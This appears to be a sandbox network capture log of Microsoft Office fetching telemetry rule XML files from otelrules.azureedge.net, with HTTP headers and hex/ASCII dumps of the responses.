                                                                                                                                                                                            x-ms-request-id: e6bcc5b6-c01e-0046-7064-3b2db9000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200536Z-185f5d8b95cqnkdjhC1NYCm8w80000000ap0000000002993
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:36 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            93192.168.2.44988713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:35 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:36 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                            x-ms-request-id: 47e3bf54-c01e-0082-038c-3aaf72000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200536Z-r1d97b99577hsvhhhC1TEByb1w00000003p0000000007d0h
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:36 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            94192.168.2.44988913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:36 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:37 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                            x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200537Z-185f5d8b95cdtclvhC1NYC4rmc0000000as0000000014svc
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:37 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            95192.168.2.44989013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:37 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:38 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                            x-ms-request-id: 21def030-601e-0084-7c7b-3b6b3f000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200538Z-1777c6cb754n67brhC1TEBcp9c0000000a0000000000xzaa
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:38 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            96192.168.2.44989113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:38 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:38 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                            x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200538Z-1777c6cb754mqztshC1TEB4mkc0000000a1000000000r89r
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:38 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            97192.168.2.44989313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:38 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:38 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                            x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200538Z-r1d97b99577sdxndhC1TEBec5n00000009hg000000001hn2
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:38 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            98192.168.2.44989213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:38 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:38 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                            x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200538Z-1777c6cb7544nvmshC1TEBf7qc00000009xg000000008xhx
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:39 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            99192.168.2.44989413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:38 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:39 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                            x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200539Z-178bfbc474bbbqrhhC1NYCvw7400000000mg00000000kfbf
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:39 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            100192.168.2.44989513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:40 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:40 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                            x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200540Z-178bfbc474bbbqrhhC1NYCvw7400000000m000000000mc8w
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:40 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            101192.168.2.44989713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:40 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:40 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                            x-ms-request-id: 1a87898e-001e-002b-2066-3b99f2000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200540Z-185f5d8b95cqnkdjhC1NYCm8w80000000ag000000000zg59
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


